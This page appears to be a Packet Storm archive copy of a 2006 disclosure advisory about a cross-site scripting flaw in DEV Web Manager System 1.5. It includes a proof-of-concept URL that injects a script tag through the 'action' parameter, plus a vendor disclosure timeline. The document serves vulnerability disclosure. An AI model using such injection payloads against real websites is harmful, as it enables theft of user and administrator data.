what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DEVWeb-1.5.txt

DEVWeb-1.5.txt
Posted Oct 20, 2006
Authored by CorryL | Site x0n3-h4ck.org

DEV Web Manager System versions less than or equal to 1.5 cross site scripting exploit.

tags | exploit, web, xss
SHA-256 | 230787c742f05b737de56c0b48b334ec4de1a9b89c708eb321c94cbcb104308d

DEVWeb-1.5.txt

Change Mirror Download
This is a multi-part message in MIME format.

------_=_NextPart_001_01C6F219.260F14A2
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-=3D[--------------------ADVISORY-------------------]=3D-
-=3D[ =
]=3D-
-=3D[ DEV Web Manager System <=3D 1.5 ]=3D-
-=3D[ =
]=3D-
-=3D[ Author: CorryL [corryl80@gmail.com] ]=3D-
-=3D[ www.x0n3-h4ck.org ]=3D-
-=3D[----------------------------------------------------]=3D-


-=3D[+] Application: DEV Web Manager System
-=3D[+] Version: 1.5
-=3D[+] Vendor's URL: http://dev-wms.sourceforge.net/
-=3D[+] Platform: Windows\Linux\Unix
-=3D[+] Bug type: cross-site script [XSS]
-=3D[+] Exploitation: Remote
-=3D[-]
-=3D[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=3D[+] Reference: www.x0n3-h4ck.org


..::[ Descriprion ]::..

DEV web manager system one application web based on php


..::[ Bug ]::..

this system e' affect from a bug of type XSS=20
a attaker to use the bug in order to steal sensitive information=20
to the users or admin


..::[ Proof Of Concept ]::..

http://web =
site/index.php?session=3D0&action=3D>"><ScRiPt%20%0a%0d>alert(775195196)%=
3B</ScRiPt>


..::[ Workaround ]::..

Nothing

..::[ Disclousure Timeline ]::..

[07/10/2006] - Vendor notification
[11/10/2006] - Vendor Response
[17/10/2006] - No patch relase from vendor
[17/10/2006] - Public disclousure


*********************
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!
Per maggiori informazioni vai su: =
http://adsl.alice.it/servizi/alicebasic.html=20

------_=_NextPart_001_01C6F219.260F14A2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Diso-8859-1">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
6.5.7650.21">
<TITLE>{x0n3-h4ck} DEV Web Manager System <=3D 1.5 XSS =
Exploit</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT =
SIZE=3D2>-=3D[--------------------ADVISORY-------------------]=3D-<BR>
-=3D[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=3D-<BR>
-=3D[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DEV Web Manager System =
<=3D 1.5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
]=3D-<BR>
-=3D[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=3D-<BR>
-=3D[&nbsp;&nbsp;&nbsp;&nbsp; Author: CorryL =
[corryl80@gmail.com]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]=3D-<BR>
-=3D[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp; =
www.x0n3-h4ck.org&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
]=3D-<BR>
-=3D[----------------------------------------------------]=3D-<BR>
<BR>
<BR>
-=3D[+] Application:&nbsp;&nbsp;&nbsp; DEV Web Manager System<BR>
-=3D[+] Version:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.5<BR>
-=3D[+] Vendor's URL:&nbsp;&nbsp; <A =
HREF=3D"http://dev-wms.sourceforge.net/">http://dev-wms.sourceforge.net/<=
/A><BR>
-=3D[+] Platform:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
Windows\Linux\Unix<BR>
-=3D[+] Bug type:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cross-site script =
[XSS]<BR>
-=3D[+] Exploitation:&nbsp;&nbsp; Remote<BR>
-=3D[-]<BR>
-=3D[+] Author:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
CorryL&nbsp; ~ corryl80[at]gmail[dot]com ~<BR>
-=3D[+] Reference:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; www.x0n3-h4ck.org<BR>
<BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
DEV web manager system one application web based on php<BR>
<BR>
<BR>
..::[ Bug ]::..<BR>
<BR>
this system e' affect from a bug of type XSS<BR>
a attaker to use the bug in order to steal sensitive information<BR>
to the users or admin<BR>
<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
<A HREF=3D"http://web">http://web</A> =
site/index.php?session=3D0&action=3D>"><ScRiPt%20%0a%0d=
>alert(775195196)%3B</ScRiPt><BR>
<BR>
<BR>
..::[ Workaround ]::..<BR>
<BR>
Nothing<BR>
<BR>
..::[ Disclousure Timeline ]::..<BR>
<BR>
[07/10/2006] - Vendor notification<BR>
[11/10/2006] - Vendor Response<BR>
[17/10/2006] - No patch relase from vendor<BR>
[17/10/2006] - Public disclousure<BR>
<BR>
<BR>
*********************<BR>
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!<BR>
Per maggiori informazioni vai su: <A =
HREF=3D"http://adsl.alice.it/servizi/alicebasic.html">http://adsl.alice.i=
t/servizi/alicebasic.html</A> </FONT>
</P>

</BODY>
</HTML>
------_=_NextPart_001_01C6F219.260F14A2--

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close